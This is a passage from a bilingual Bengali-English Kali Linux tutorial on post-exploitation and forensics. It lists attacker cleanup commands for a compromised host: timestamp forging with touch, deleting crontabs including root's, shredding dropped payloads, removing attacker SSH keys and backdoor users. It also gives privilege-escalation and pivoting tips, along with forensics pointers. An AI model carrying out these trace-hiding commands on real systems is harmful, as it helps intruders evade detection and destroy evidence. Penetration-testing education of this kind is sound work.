# File-এর timestamp আগের মতো করো target$ touch -t 202301011200 /tmp/malware.sh # Jan 1, 2023, 12:00 # অন্য file-এর মতো timestamp করো target$ touch -r /etc/passwd /tmp/suspicious_file # Access ও modify time আলাদাভাবে সেট করো target$ touch -a -t 202301010000 file # Access time target$ touch -m -t 202301010000 file # Modify time

🔒 Persistence Remove করোRemove Persistence

# Cron job remove করো target$ crontab -r # Current user-এর crontab target$ crontab -u root -r # Root-এর crontab # Dropped files মুছো target$ shred -zu /tmp/payload.sh # Secure delete (overwrite) target$ rm -rf /tmp/.hidden_folder/ # SSH authorized_keys থেকে key মুছো target$ sed -i '/attacker_key/d' ~/.ssh/authorized_keys # Added user remove করো target$ userdel -r backdoor_user

🔬 Post-Exploitation & Forensics — মূল কথাPost-Exploitation & Forensics — Key Points

🐛 LinPEAS/WinPEAS: Shell পাওয়ার সাথে সাথেই চালাও — PrivEsc vector খুঁজে দেবেLinPEAS/WinPEAS: Run immediately after getting shell — finds PrivEsc vectors
⬆️ PrivEsc Order: Sudo → SUID → Cron → PATH → Capabilities → Kernel
🚇 Pivoting: Internal network-এ পৌঁছাতে Chisel SOCKS proxy সবচেয়ে reliablePivoting: Chisel SOCKS proxy is most reliable for reaching internal networks
🧠 Memory Forensics: RAM dump পেলে প্রথমে pslist, psscan, netstat, malfind চালাওMemory Forensics: With RAM dump first run pslist, psscan, netstat, malfind
💽 Disk Forensics: Image তৈরির পরে MD5 verify করো — chain of custody রক্ষাDisk Forensics: Verify MD5 after imaging — preserve chain of custody
📋 Logs: /var/log/auth.log ও web logs সবার আগে দেখো — attacker-এর footprint পাবেLogs: Check /var/log/auth.log and web logs first — find attacker footprints

🎉 Kali Linux Series — সম্পূর্ণ!

সিরিজের সব Part সফলভাবে শেষ হয়েছে।All parts of the series successfully completed.

✅ Part 1 — Basic Commands + Recon

✅ Part 2 — Web Hacking Tools

✅ Part 3 — Exploitation Tools

✅ Part 4 — Password + Wireless

✅ Part 5 — Post-Exploitation + Forensics

🐧 "The best security professional is the one who thinks like an attacker and defends like a guardian."

সব কিছু authorized environment-এ practice করো। Permission ছাড়া কোনো system-এ attack করা সম্পূর্ণ illegal।Practice in authorized environments only. Attacking systems without permission is completely illegal.

Kali Linux Series — Part 5 | v1.0 | Post-Exploitation & Forensics

Kali Linux — Part 5

Post-Exploitation & Forensics — সম্পূর্ণ বাংলা গাইড Post-Exploitation & Forensics — Complete Guide